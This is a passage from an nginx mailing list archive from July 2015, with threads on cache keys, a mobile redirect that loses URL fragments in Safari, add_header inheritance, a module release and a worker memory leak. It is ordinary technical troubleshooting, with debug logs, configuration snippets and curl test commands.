2015, at 16:49, sz_g wrote: > > I've just created a configuration composed of two servers. > Both just forwards traffic from different ports (and protocols) to different > servers, and keep responses in cache. It works nice. > > For both servers "GET /" request is sent, in the response there is proper > resource. Thus (to distinguish responses in the cache) I added for both > cache_key: > > proxy_cache_key "$upstream_addr*$request?; At the time when this expression is evaluated, $upstream_addr is still unknown since no upstream connection is made. Obviously, if a key is found in cache, there will be no upstream connection at all. So it?s not a good idea to use $upstream_addr in key definition. Instead, you can use the parts of request which define the upstream address. > > But it doesn't work. I found that upstream states are not available and thus > "proxied" address is not known when cache key is computed. And "proxied" > address is computed only when additional stream must be used.. > > Is there any way to get proper key? Or any other way to keep all copies in > the cache? > > I plan to add "load balancing" module, which would be able to forward > request on (multiple) source addresses to multiple proxied addresses, with > caching.. Will it work properly? > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260086,260086#msg-260086 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Roman Arutyunyan From nginx-forum at nginx.us Mon Jul 6 16:39:38 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 12:39:38 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> Message-ID: I 'am running Nginx with logging in debug mode and the report for "^/$" is : 2015/07/06 15:32:21 [debug] 6500#0: *9 accept: 193.137.170.139 fd:20 2015/07/06 15:32:21 [debug] 6500#0: *9 event timer add: 20: 60000:1436196801837 2015/07/06 15:32:21 [debug] 6500#0: *9 reusable connection: 1 2015/07/06 15:32:21 [debug] 6500#0: *9 epoll add event: fd:20 op:1 ev:80000001 2015/07/06 15:32:21 [debug] 6500#0: accept() not ready (11: Resource temporarily unavailable) 2015/07/06 15:32:21 [debug] 6500#0: *9 post event 0000000000AC5440 2015/07/06 15:32:21 [debug] 6500#0: *9 delete posted event 0000000000AC5440 2015/07/06 15:32:21 [debug] 6500#0: *9 http wait request handler 2015/07/06 15:32:21 [debug] 6500#0: *9 posix_memalign: 0000000000922D70:256 @16 2015/07/06 15:32:21 [debug] 6500#0: *9 malloc: 0000000000A450C0:1024 2015/07/06 15:32:21 [debug] 6500#0: *9 recv: fd:20 427 of 1024 2015/07/06 15:32:21 [debug] 6500#0: *9 reusable connection: 0 2015/07/06 15:32:21 [debug] 6500#0: *9 posix_memalign: 0000000000A46810:4096 @16 2015/07/06 15:32:21 [debug] 6500#0: *9 http process request line 2015/07/06 15:32:21 [debug] 6500#0: *9 http request line: "GET / HTTP/1.1" 2015/07/06 15:32:21 [debug] 6500#0: *9 http uri: "/" 2015/07/06 15:32:21 [debug] 6500#0: *9 http args: "" 2015/07/06 15:32:21 [debug] 6500#0: *9 http exten: "" 2015/07/06 15:32:21 [debug] 6500#0: *9 posix_memalign: 0000000000A47E10:4096 @16 2015/07/06 15:32:21 [debug] 6500#0: *9 http process request header line 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Host: www.domain.com" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Accept-Encoding: gzip, deflate" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Accept-Language: pt-pt" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Cookie: cookie=true; lang=pt; _ga=GA1.2.894621310.1424776292" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "Connection: keep-alive" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "DNT: 1" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header: "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" 2015/07/06 15:32:21 [debug] 6500#0: *9 http header done 2015/07/06 15:32:21 [debug] 6500#0: *9 event timer del: 20: 1436196801837 2015/07/06 15:32:21 [debug] 6500#0: *9 generic phase: 0 2015/07/06 15:32:21 [debug] 6500#0: *9 rewrite phase: 1 2015/07/06 15:32:21 [debug] 6500#0: *9 http script var 2015/07/06 15:32:21 [debug] 6500#0: *9 http script var: "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex: "(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)" 2015/07/06 15:32:21 [notice] 6500#0: *9 "(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)" matches "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53", client: 193.137.170.139, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script if 2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex: "^/$" 2015/07/06 15:32:21 [notice] 6500#0: *9 "^/$" matches "/", client: 193.137.170.139, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script copy: "http://m.domain.com/" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script capture: "" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex end 2015/07/06 15:32:21 [notice] 6500#0: *9 rewritten redirect: "http://m.domain.com/", client: 193.137.170.139, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com" 2015/07/06 15:32:21 [debug] 6500#0: *9 http finalize request: 301, "/?" a:1, c:1 2015/07/06 15:32:21 [debug] 6500#0: *9 http special response: 301, "/?" 2015/07/06 15:32:21 [debug] 6500#0: *9 http set discard body 2015/07/06 15:32:21 [debug] 6500#0: *9 xslt filter header 2015/07/06 15:32:21 [debug] 6500#0: *9 HTTP/1.1 301 Moved Permanently Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260096#msg-260096 From nginx-forum at nginx.us Mon Jul 6 16:40:37 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 12:40:37 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7362a9bc51bfa4573fd919369ca2b256.NginxMailingListEnglish@forum.nginx.org> The "^/$" came from : #to detect if the device with www entered in domain is mobile if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^/$ http://m.domain.com$request_uri; } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260097#msg-260097 From nginx-forum at nginx.us Mon Jul 6 16:57:00 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Mon, 06 Jul 2015 12:57:00 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi I think the part where de parameters are clean is : 2015/07/06 15:32:21 [debug] 6500#0: *9 http script copy: "http://m.domain.com/" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script capture: "" 2015/07/06 15:32:21 [debug] 6500#0: *9 http script regex end 2015/07/06 15:32:21 [notice] 6500#0: *9 rewritten redirect: "http://m.domain.com/", client: xxx.xxx.xxx.xxx, server: www.domain.com, request: "GET / HTTP/1.1", host: "www.domain.com" 2015/07/06 15:32:21 [debug] 6500#0: *9 http finalize request: 301, "/?" a:1, c:1 2015/07/06 15:32:21 [debug] 6500#0: *9 http special response: 301, "/?" 2015/07/06 15:32:21 [debug] 6500#0: *9 http set discard body 2015/07/06 15:32:21 [debug] 6500#0: *9 xslt filter header 2015/07/06 15:32:21 [debug] 6500#0: *9 HTTP/1.1 301 Moved Permanently I can't understand the last lines, what does it means Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260098#msg-260098 From francis at daoine.org Mon Jul 6 18:20:36 2015 From: francis at daoine.org (Francis Daly) Date: Mon, 6 Jul 2015 19:20:36 +0100 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <7362a9bc51bfa4573fd919369ca2b256.NginxMailingListEnglish@forum.nginx.org> References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> <7362a9bc51bfa4573fd919369ca2b256.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150706182036.GT23844@daoine.org> On Mon, Jul 06, 2015 at 12:40:37PM -0400, ramsoft75 wrote: Hi there, Things seem to be getting a lot more complicated than they need to. > The "^/$" came from : > > #to detect if the device with www entered in domain is mobile > if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows > Phone)') { > rewrite ^/$ http://m.domain.com$request_uri; > } That's not the configuration you started with. You indicated that with your starting configuration, some requests did get the response that you wanted, and some did not. I have been unable to reproduce the "did not" case; probably because I do not fully understand what your expectations are. Can you go back to your starting configuration, and do whatever it takes to get the "ok" request/response, and then show the access_log entry for that request? (Or just find the old log file.) The log line should show a GET going to the "www" server, with a response code of 302. Ideally, it will also show the user-agent involved. Then can you show the log line corresponding to a "not ok" request/response? It should also show a GET going to the "www" server, with a response code of 302, if I have understood correctly what you have reported. Comparing the two log lines, particularly the request and the user-agent, may show why the "not ok" one responded as it did. f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Mon Jul 6 18:33:08 2015 From: nginx-forum at nginx.us (Alt) Date: Mon, 06 Jul 2015 14:33:08 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> References: <20150706122207.GS23844@daoine.org> <479280ef7b822dedffd91b3725941e6d.NginxMailingListEnglish@forum.nginx.org> <38553ea8b729e5f8fc44625f1be57418.NginxMailingListEnglish@forum.nginx.org> Message-ID: <98634d5bc2fff4df7585f42a27e4d5ed.NginxMailingListEnglish@forum.nginx.org> Why don't you try with requests to real pages, not to a fragment? "#" and everything after this character isn't sent to the web server, it's only used by the web client. You really should read at least: https://en.wikipedia.org/wiki/Fragment_identifier Some browsers will keep the fragment after the redirect, some others will drop it. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260101#msg-260101 From nginx-forum at nginx.us Mon Jul 6 22:20:26 2015 From: nginx-forum at nginx.us (Alt) Date: Mon, 06 Jul 2015 18:20:26 -0400 Subject: Multiple add_header Message-ID: Hello, I'm using PHP with nginx 1.9.2 and it works great! But there's something I don't understand with the add_header directive. I use add_header in server and location block, but it seems only the one in location is used. If I remove the add_header in the location block, I get the header I added in the server block. Here's a short example: server { add_header Strict-Transport-Security "max-age=604800; includeSubDomains"; location = /blah { add_header X-Test test; } } If I access /blah, I'll only get the X-Test header, while I'd like to get X-Test and Strict-Transport-Security. If I comment the add_header in the blah location and access /blah, I'll get the Strict-Transport-Security header. How can I solve this problem, without having to duplicate/include "add_header Strict-Transport-Security" everywhere? Seems http://stackoverflow.com/a/19135714 is the same problem. Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260102,260102#msg-260102 From nginx-forum at nginx.us Mon Jul 6 22:41:29 2015 From: nginx-forum at nginx.us (okamzol) Date: Mon, 06 Jul 2015 18:41:29 -0400 Subject: Multiple add_header In-Reply-To: References: Message-ID: <410fcdde2c65acf8fa03dd19b88763fc.NginxMailingListEnglish@forum.nginx.org> Hi, there is no chance to avoid the duplicates. I asked the same questions some time ago. For detailed answer on my question see http://forum.nginx.org/read.php?2,256270,256279#msg-256279. I think this will answer your question too. Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260102,260103#msg-260103 From nginx-forum at nginx.us Mon Jul 6 22:55:16 2015 From: nginx-forum at nginx.us (Alt) Date: Mon, 06 Jul 2015 18:55:16 -0400 Subject: Multiple add_header In-Reply-To: <410fcdde2c65acf8fa03dd19b88763fc.NginxMailingListEnglish@forum.nginx.org> References: <410fcdde2c65acf8fa03dd19b88763fc.NginxMailingListEnglish@forum.nginx.org> Message-ID: <814a692e7a0700d6c1270360a6d45d7d.NginxMailingListEnglish@forum.nginx.org> Hello okamzol and thanks a lot for your answer! Yes, it's exactly the same question, looks like I'll need to use include. Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260102,260104#msg-260104 From nginx-forum at nginx.us Tue Jul 7 01:34:25 2015 From: nginx-forum at nginx.us (xfeep) Date: Mon, 06 Jul 2015 21:34:25 -0400 Subject: [ANN] Nginx-Clojure v0.4.0 Release! In-Reply-To: <690dccaf31f4ce67dc0a42182a10ca8d.NginxMailingListEnglish@forum.nginx.org> References: <690dccaf31f4ce67dc0a42182a10ca8d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <315749521a56ab63b718c5a005489230.NginxMailingListEnglish@forum.nginx.org> Freebsd port upgraded nginx clojure module from 0.3.0 to 0.4.0! So on Freebsd we can chose clojure module to enable it after run pkg install nginx cd /usr/ports/www/nginx make config Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260065,260105#msg-260105 From nginx-forum at nginx.us Tue Jul 7 06:25:41 2015 From: nginx-forum at nginx.us (evgeni22) Date: Tue, 07 Jul 2015 02:25:41 -0400 Subject: leaking memory nginx 1.8.0 Message-ID: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org> Hello, need help with leaking memory i installed fresh system , centos7.1 +directadmin + nginx1.8.0 + mariadb5.5.41 + php54 & php56 both with php_fpm the server it for webhosting and i have there 32gb for now have only 4 website on it, and after 1-2hours nginx take all memory when it come to 96% it stop there and then all websites fall but nginx not, only after i reset nginx all back to normal for 1-2hours again. how can i debug where the problem? or try find the problem? seems in logs i not see anything Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260106#msg-260106 From umarzuki at gmail.com Tue Jul 7 06:51:18 2015 From: umarzuki at gmail.com (Umarzuki Mochlis) Date: Tue, 7 Jul 2015 14:51:18 +0800 Subject: leaking memory nginx 1.8.0 In-Reply-To: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org> References: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org> Message-ID: 2015-07-07 14:25 GMT+08:00 evgeni22 : > Hello, need help with leaking memory > i installed fresh system , centos7.1 +directadmin + nginx1.8.0 + > mariadb5.5.41 + php54 & php56 both with php_fpm > the server it for webhosting and i have there 32gb for now have only 4 > website on it, and after 1-2hours nginx take all memory when it come to 96% > it stop there and then all websites fall but nginx not, only after i reset > nginx all back to normal for 1-2hours again. > > how can i debug where the problem? or try find the problem? seems in logs i > not see anything > check your file descriptors' limit, try increasing it # ulimit -n From oscaretu at gmail.com Tue Jul 7 07:21:01 2015 From: oscaretu at gmail.com (oscaretu .) Date: Tue, 7 Jul 2015 09:21:01 +0200 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> References: <20150703174730.GP23844@daoine.org> <4ea90426d3cd5b22ec9305de4f5767ba.NginxMailingListEnglish@forum.nginx.org> Message-ID: You should protect the URL with single quotes, to avoid the interpretation of character ! by the shell: curl -A iPad -i 'https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J' But if you put the URL https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J in a browser (at least in Firefox), the browser sends to the web server only the first part of that URL: https://www.domain.com/ because the character # is a special one. Surprisingly, curl sends the full URL to the webserver. Greetings, Oscar On Sun, Jul 5, 2015 at 9:31 PM, ramsoft75 wrote: > Hi there > > I changed to > > #to detect if the device with www entered in domain is mobile > if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows > Phone)') { > rewrite ^ http://m.domain.com$request_uri; > } > > I executed the command : > > $ curl -A iPad -i https://www.domain.com/#!/pt/--item-view/pt/32081/Mix-J > > And the result was : > > -bash: !/pt/--item-view/pt/32081/Mix-J: event not found > > This only append's with Safari, there's no problem with Chrome (Desktop, > Mobile) or Internet Explorer in Pc, could this be a browser problem and not > an Nginx configuration problem ? > > Thanks > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,260033,260064#msg-260064 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Oscar Fernandez Sierra oscaretu at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Jul 7 08:02:09 2015 From: nginx-forum at nginx.us (evgeni22) Date: Tue, 07 Jul 2015 04:02:09 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: References: Message-ID: do you sure to increase? does not it will eat faster the memory? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260109#msg-260109 From nginx-forum at nginx.us Tue Jul 7 09:28:56 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Tue, 07 Jul 2015 05:28:56 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: References: Message-ID: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> Hi there all and thank's for the help Dear oscaretu, the curl was tested with " doesn't help, because ! is a special character it needs a escaope after "\", so the correct curl command for the terminal is : $ curl -A iPad -i http://www.domain.com/#\!/pt/--item-view/en/3190/Wok Dear Francis Daly For the initial configuration : if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^ http://m.domain.com/$request_uri; } For the example above the output in terminal is : HTTP/1.1 302 Moved Temporarily Server: nginx Date: Tue, 07 Jul 2015 09:19:47 GMT Content-Type: text/html Content-Length: 154 Connection: keep-alive Location: http://m.domain.com// 302 Found

302 Found


nginx
It's the same if i changed to : if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^/$ http://m.domain.com/$request_uri; } The problem is not from Nginx but from Safari witch doesn't send the url after #, the Safari removes the fragment. There are some documentation about this in : http://randomproblems.com/parameter-passing-redirect-craziness-301-redirects-fragment-identifiers-hash-query-string-variables/ http://news.qooxdoo.org/http-redirects-and-loss-of-fragment-identifiers The question know how to handle this # problem with Safari. Thank's for the help Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260110#msg-260110 From nginx-forum at nginx.us Tue Jul 7 10:29:35 2015 From: nginx-forum at nginx.us (Alt) Date: Tue, 07 Jul 2015 06:29:35 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> References: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> Message-ID: <53d0b39a2647105dc8f0ca631b396070.NginxMailingListEnglish@forum.nginx.org> Hello, Francis Daly asked you several times to check the access.log file (you should not find the fragment part in there). oscaretu and I told you browsers don't send the fragment part of an URL. The problem isn't from nginx nor the browser: it's a normal behavior. Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260111#msg-260111 From nginx-forum at nginx.us Tue Jul 7 11:07:58 2015 From: nginx-forum at nginx.us (smsmaddy1981) Date: Tue, 07 Jul 2015 07:07:58 -0400 Subject: Static content In-Reply-To: References: Message-ID: Hi Mike Thanks for your quick reply... To answer your questions: - Upstream servers yes (where applications are deployed). And, not NGinx installations. - I tried accessing the static content on other servers, that isn't working... I tried using root, rewrite,.. directives. Is it possible to share an code snippet to achieve this use case pls.? Regards, Maddy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259989,260112#msg-260112 From oscaretu at gmail.com Tue Jul 7 12:32:30 2015 From: oscaretu at gmail.com (oscaretu .) Date: Tue, 7 Jul 2015 14:32:30 +0200 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> References: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> Message-ID: Yo don't need to escape the "!" if you delimit the URL with single quotes... On Tue, Jul 7, 2015 at 11:28 AM, ramsoft75 wrote: > Hi there all and thank's for the help > > Dear oscaretu, the curl was tested with " doesn't help, because ! is a > special character it needs a escaope after "\", so the correct curl command > for the terminal is : > > $ curl -A iPad -i http://www.domain.com/#\!/pt/--item-view/en/3190/Wok > > Dear Francis Daly > > For the initial configuration : > > if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows > Phone)') { > rewrite ^ http://m.domain.com/$request_uri; > } > > > For the example above the output in terminal is : > > HTTP/1.1 302 Moved Temporarily > Server: nginx > Date: Tue, 07 Jul 2015 09:19:47 GMT > Content-Type: text/html > Content-Length: 154 > Connection: keep-alive > Location: http://m.domain.com// > > > 302 Found > >

302 Found

>
nginx
> > > > It's the same if i changed to : > > if ($http_user_agent ~* > '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { > rewrite ^/$ http://m.domain.com/$request_uri; > } > > The problem is not from Nginx but from Safari witch doesn't send the url > after #, the Safari removes the fragment. > > There are some documentation about this in : > > > http://randomproblems.com/parameter-passing-redirect-craziness-301-redirects-fragment-identifiers-hash-query-string-variables/ > http://news.qooxdoo.org/http-redirects-and-loss-of-fragment-identifiers > > The question know how to handle this # problem with Safari. > > Thank's for the help > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,260033,260110#msg-260110 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Oscar Fernandez Sierra oscaretu at gmail.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Tue Jul 7 13:03:53 2015 From: nginx-forum at nginx.us (evgeni22) Date: Tue, 07 Jul 2015 09:03:53 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: References: Message-ID: <347e4be1a5f3ab08f272e881541f2e1a.NginxMailingListEnglish@forum.nginx.org> $ su nginx --shell /bin/bash --command "ulimit -n" 4096 it not fix the problem nginx 10062 0.0 44.5 14763332 14639972 ? S 14:56 0:00 nginx: worker process nginx 10063 0.0 44.5 14763332 14639964 ? S 14:56 0:00 nginx: worker process nginx 10064 0.1 44.5 14763332 14639984 ? S 14:56 0:00 nginx: worker process nginx 10065 0.1 44.5 14763332 14640880 ? S 14:56 0:00 nginx: worker process have you more advice? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260114#msg-260114 From nginx-forum at nginx.us Tue Jul 7 14:44:46 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Tue, 07 Jul 2015 10:44:46 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <53d0b39a2647105dc8f0ca631b396070.NginxMailingListEnglish@forum.nginx.org> References: <25a7de56d992bc387328f3cf1f9ff0fc.NginxMailingListEnglish@forum.nginx.org> <53d0b39a2647105dc8f0ca631b396070.NginxMailingListEnglish@forum.nginx.org> Message-ID: "Hello, Francis Daly asked you several times to check the access.log file (you should not find the fragment part in there). oscaretu and I told you browsers don't send the fragment part of an URL. The problem isn't from nginx nor the browser: it's a normal behavior. Best Regards" In deed there was no information in access.log, the only information i published was from error.log with nginx debug mode and an error 302 is not a error. It's not an Nginx problem it's a Safari problem. Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260116#msg-260116 From vbart at nginx.com Tue Jul 7 17:04:27 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 07 Jul 2015 20:04:27 +0300 Subject: leaking memory nginx 1.8.0 In-Reply-To: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org> References: <30dc3ba76568e62ca7e2954e6fe3a25b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <3335299.BWqfcoXYiD@vbart-workstation> On Tuesday 07 July 2015 02:25:41 evgeni22 wrote: > Hello, need help with leaking memory > i installed fresh system , centos7.1 +directadmin + nginx1.8.0 + > mariadb5.5.41 + php54 & php56 both with php_fpm > the server it for webhosting and i have there 32gb for now have only 4 > website on it, and after 1-2hours nginx take all memory when it come to 96% > it stop there and then all websites fall but nginx not, only after i reset > nginx all back to normal for 1-2hours again. > > how can i debug where the problem? or try find the problem? seems in logs i > not see anything > Could you provide "nginx -V" output? wbr, Valentin V. Bartenev From nginx-forum at nginx.us Tue Jul 7 17:12:42 2015 From: nginx-forum at nginx.us (evgeni22) Date: Tue, 07 Jul 2015 13:12:42 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <3335299.BWqfcoXYiD@vbart-workstation> References: <3335299.BWqfcoXYiD@vbart-workstation> Message-ID: <05295b8005401f3a0dff43d8fff17e58.NginxMailingListEnglish@forum.nginx.org> $ nginx -V nginx version: nginx/1.8.0 built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx --group=nginx --prefix=/usr --sbin-path=/usr/sbin --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access_log --error-log-path=/var/log/nginx/error_log --with-ipv6 --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module --with-http_realip_module --with-http_stub_status_module --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D FD_SETSIZE=32768'' i not sure yet but 4 last hours seems leak stoped after i stop security_mod, can be the security_mod doing this leaking in nginx ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260118#msg-260118 From vbart at nginx.com Tue Jul 7 17:19:09 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Tue, 07 Jul 2015 20:19:09 +0300 Subject: leaking memory nginx 1.8.0 In-Reply-To: <05295b8005401f3a0dff43d8fff17e58.NginxMailingListEnglish@forum.nginx.org> References: <3335299.BWqfcoXYiD@vbart-workstation> <05295b8005401f3a0dff43d8fff17e58.NginxMailingListEnglish@forum.nginx.org> Message-ID: <3497464.ifCHdAZQAx@vbart-workstation> On Tuesday 07 July 2015 13:12:42 evgeni22 wrote: > $ nginx -V > nginx version: nginx/1.8.0 > built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) > built with OpenSSL 1.0.1e-fips 11 Feb 2013 > TLS SNI support enabled > configure arguments: > --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx > --group=nginx --prefix=/usr --sbin-path=/usr/sbin > --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid > --http-log-path=/var/log/nginx/access_log > --error-log-path=/var/log/nginx/error_log --with-ipv6 > --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module > --with-http_realip_module --with-http_stub_status_module > --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D > FD_SETSIZE=32768'' > > > i not sure yet but 4 last hours seems leak stoped after i stop > security_mod, can be the security_mod doing this leaking in nginx ? > [..] I'm sure it can. wbr, Valentin V. Bartenev From nginx-forum at nginx.us Tue Jul 7 19:37:32 2015 From: nginx-forum at nginx.us (evgeni22) Date: Tue, 07 Jul 2015 15:37:32 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <3497464.ifCHdAZQAx@vbart-workstation> References: <3497464.ifCHdAZQAx@vbart-workstation> Message-ID: <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> ok need help, it not security_mod, it begin grow again. when server begin activate, i mean users begin upload files or replace files the memory increase immediately and not going down after they finish. now the server ate 12gb of ram, if i do reset to nginx it going down to 4.5gb ram. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260122#msg-260122 From nginx-forum at nginx.us Tue Jul 7 19:47:56 2015 From: nginx-forum at nginx.us (itpp2012) Date: Tue, 07 Jul 2015 15:47:56 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> Message-ID: <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> Show us the nginx.conf, maybe you're using some weird large value somewhere. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260123#msg-260123 From nginx-forum at nginx.us Tue Jul 7 20:02:41 2015 From: nginx-forum at nginx.us (evgeni22) Date: Tue, 07 Jul 2015 16:02:41 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> 